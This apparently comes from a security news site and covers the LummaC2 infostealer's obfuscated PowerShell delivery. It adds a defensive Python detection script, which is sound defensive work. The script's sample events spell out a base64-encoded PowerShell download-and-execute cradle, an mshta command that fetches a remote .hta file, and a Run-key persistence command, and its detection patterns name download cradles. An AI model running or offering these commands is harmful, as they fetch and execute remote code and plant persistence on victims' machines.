LummaC2 infostealer uses obfuscated PowerShell scripts to target endpoints – Cyber Tech
A new sample of the LummaC2 infostealer was observed using a series of PowerShell commands that downloaded and executed a payload on a targeted endpoint.
In a recent blog post, researchers at Ontinue described LummaC2 as information-stealing malware written in the C programming language and designed to steal sensitive information.
The researchers said the malware is offered as malware-as-a-service (MaaS) and has been advertised on Russian-speaking forums since 2022. It infects the target host, collects information from the endpoint, and then exfiltrates it to a command-and-control (C2) server.
“The key takeaway from our analysis is a reinforcement of the importance of monitoring and mitigating obfuscated scripts, particularly those delivered via PowerShell,” said Rhys Downing, cyber defender at Ontinue. “While the use of obfuscated PowerShell commands is not new, it remains a highly effective technique for attackers. Security teams should prioritize enhancing their detection and response capabilities around such tactics, ensuring that even well-known methods are continuously scrutinized and blocked.”
Why security pros should pay attention to LummaC2's resurgence
LummaC2's resurgence highlights significant risk because of its sophisticated use of PowerShell and of "living-off-the-land" binaries already present in the environment, which makes it harder to detect and mitigate, said Jason Soroko, senior fellow at Sectigo.
Unlike typical PowerShell-based malware, Soroko said, LummaC2 combines obfuscation, trusted Windows binaries (mshta.exe and dllhost.exe), and persistence through registry modifications to evade defenses and maintain long-term control.
“The critical takeaway is the malware's advanced multi-stage infection process and ability to exploit legitimate system tools, which requires heightened vigilance and proactive defense strategies from security teams,” said Soroko. “While PowerShell commands are commonly exploited, LummaC2's combination of tactics presents a unique and more challenging threat.”
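To make the detection work Downing and Soroko describe concrete, here is an added example written for this page (it is not Ontinue's tooling and contains nothing recovered from the LummaC2 sample). The Python script triages a handful of constructed process-creation events for the three behaviours named above: an obfuscated PowerShell launch whose -EncodedCommand body is decoded and checked for a download cradle, mshta.exe and dllhost.exe started outside their normal context, and a write to a Run key. The event shape, the command lines, the 203.0.113.10 address and the thresholds are assumptions for the example.

```python
"""Added triage example (not from the Ontinue write-up or the LummaC2 sample).
Scans constructed process-creation events for obfuscated/encoded PowerShell
download cradles, mshta.exe and dllhost.exe abuse, and Run-key persistence.
Event fields, command lines and the 203.0.113.10 address are assumptions."""
import base64
import re
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Finding:
    event_id: int
    rule: str
    detail: str


# powershell.exe accepts any unambiguous prefix of -EncodedCommand; these are
# the spellings most often seen on the command line.
ENC_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
RUN_KEY_RE = re.compile(r"(?:HKCU|HKLM|HKEY_CURRENT_USER|HKEY_LOCAL_MACHINE)[:\\]+"
                        r"Software\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\b", re.I)
REG_WRITE_RE = re.compile(r"\breg(?:\.exe)?\s+add\b|set-itemproperty|new-itemproperty", re.I)
PS_SWITCHES = [  # launch flags that hide the console and disable safety rails
    (re.compile(r"\s-(?:w|win|windowstyle)\s+hidden", re.I), "hidden_window"),
    (re.compile(r"\s-(?:nop|noprofile)\b", re.I), "no_profile"),
    (re.compile(r"\s-(?:ep|executionpolicy)\s+bypass", re.I), "execpolicy_bypass"),
]
PS_BODY = [  # download-and-execute and string-building idioms
    (re.compile(r"\b(?:iex|invoke-expression)\b", re.I), "invoke_expression"),
    (re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", re.I), "download_cradle"),
    (re.compile(r"\[char\]|frombase64string|-join\b|`", re.I), "string_obfuscation"),
]
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def decode_encoded_command(cmd: str) -> Optional[str]:
    """Recover the UTF-16LE script hidden behind -EncodedCommand, or None."""
    m = ENC_RE.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_powershell(cmd: str) -> list:
    """Indicator labels for a PowerShell command line, including its decoded body."""
    labels = [label for rx, label in PS_SWITCHES if rx.search(cmd)]
    decoded = decode_encoded_command(cmd)
    body = ENC_RE.sub(" ", cmd)  # drop the base64 blob so it cannot match text rules
    if decoded is not None:
        labels.append("encoded_command")
        body += "\n" + decoded
    return labels + [label for rx, label in PS_BODY if rx.search(body)]


def analyze_lolbin(parent: str, image: str, cmd: str) -> list:
    """Heuristics (assumptions, not vendor signatures) for the two binaries the article names."""
    name = image.rsplit("\\", 1)[-1].lower()
    pname = parent.rsplit("\\", 1)[-1].lower()
    labels = []
    if name == "mshta.exe":
        # mshta exists to open local .hta files; a URL or inline script protocol on its
        # command line, or a scripting-host parent, is the download-and-run pattern.
        if re.search(r"(?:javascript|vbscript):|https?://", cmd, re.I):
            labels.append("mshta_inline_script_or_url")
        if pname in SCRIPT_HOSTS:
            labels.append("mshta_spawned_by_script_host")
    elif name == "dllhost.exe":
        # The COM surrogate is normally started by svchost.exe with /Processid:{GUID}.
        if "/processid:" not in cmd.lower():
            labels.append("dllhost_without_processid")
        if pname != "svchost.exe":
            labels.append("dllhost_unusual_parent")
    return labels


def analyze_persistence(cmd: str) -> Optional[str]:
    """Return the Run/RunOnce key the command line writes to, if any."""
    key = RUN_KEY_RE.search(cmd)
    return key.group(0) if key and REG_WRITE_RE.search(cmd) else None


def triage(events: list) -> list:
    findings = []
    for ev in events:
        name = ev["image"].rsplit("\\", 1)[-1].lower()
        body = ev["cmd"]
        if name in ("powershell.exe", "pwsh.exe"):
            labels = analyze_powershell(body)
            decoded = decode_encoded_command(body)
            body = ENC_RE.sub(" ", body) + ("\n" + decoded if decoded else "")
            if len(labels) >= 2:  # one flag alone is noisy; the combination is the tell
                findings.append(Finding(ev["id"], "suspicious_powershell", ",".join(labels)))
        for label in analyze_lolbin(ev["parent"], ev["image"], ev["cmd"]):
            findings.append(Finding(ev["id"], label, ev["cmd"]))
        key = analyze_persistence(body)  # also catches Run-key writes inside decoded PowerShell
        if key:
            findings.append(Finding(ev["id"], "run_key_persistence", key))
    return findings


def summarize(events: list) -> dict:
    """Event id -> sorted rule names, for quick review."""
    out = {}
    for f in triage(events):
        out.setdefault(f.event_id, []).append(f.rule)
    return {k: sorted(v) for k, v in out.items()}


def _encoded(script: str) -> str:
    """Build a -EncodedCommand argument the way powershell.exe expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/s.txt')"
PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed Sysmon-EID-1-style records, not real telemetry
    {"id": 1, "parent": r"C:\Windows\explorer.exe", "image": PS_PATH,
     "cmd": "powershell.exe -nop -w hidden -ep bypass -enc " + _encoded(STAGE2)},
    {"id": 2, "parent": PS_PATH, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": "mshta.exe http://203.0.113.10/update.hta"},
    {"id": 3, "parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\dllhost.exe",
     "cmd": "dllhost.exe"},
    {"id": 4, "parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\reg.exe",
     "cmd": r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /d C:\Users\Public\u.hta"},
    # Benign controls: an admin one-liner and the real COM surrogate launch.
    {"id": 5, "parent": r"C:\Windows\explorer.exe", "image": PS_PATH,
     "cmd": "powershell.exe -Command Get-Process"},
    {"id": 6, "parent": r"C:\Windows\System32\svchost.exe", "image": r"C:\Windows\System32\dllhost.exe",
     "cmd": "dllhost.exe /Processid:{12345678-1234-1234-1234-123456789ABC}"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"event {f.event_id}: {f.rule} ({f.detail})")
```

Two design points matter in practice. The base64 blob is removed from the command line before the text rules run, and the rules are applied to the decoded script instead; otherwise an encoded cradle is invisible to a string match, which is the whole reason the technique works. And a single flag such as -w hidden is not reported on its own: plenty of legitimate automation uses it, so the rule fires only on the combination of evasion switches plus a cradle, which is the pattern the Ontinue and Sectigo commentary above is pointing at.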
Itzik Alvas, co-founder and CEO at Entro Security, added that the LummaC2 infostealer lets attackers compromise the credentials of both human and non-human identities (NHIs) on infected systems. Alvas said that while the initial scope of an attack is often relatively benign, and most industries have standardized IAM and governance controls in place to limit the risk from compromised human credentials, NHIs are frequently created and used with excessive permissions.
“As a result, compromised NHIs allow attackers on an infected system to covertly attack the entire organization from within,” said Alvas.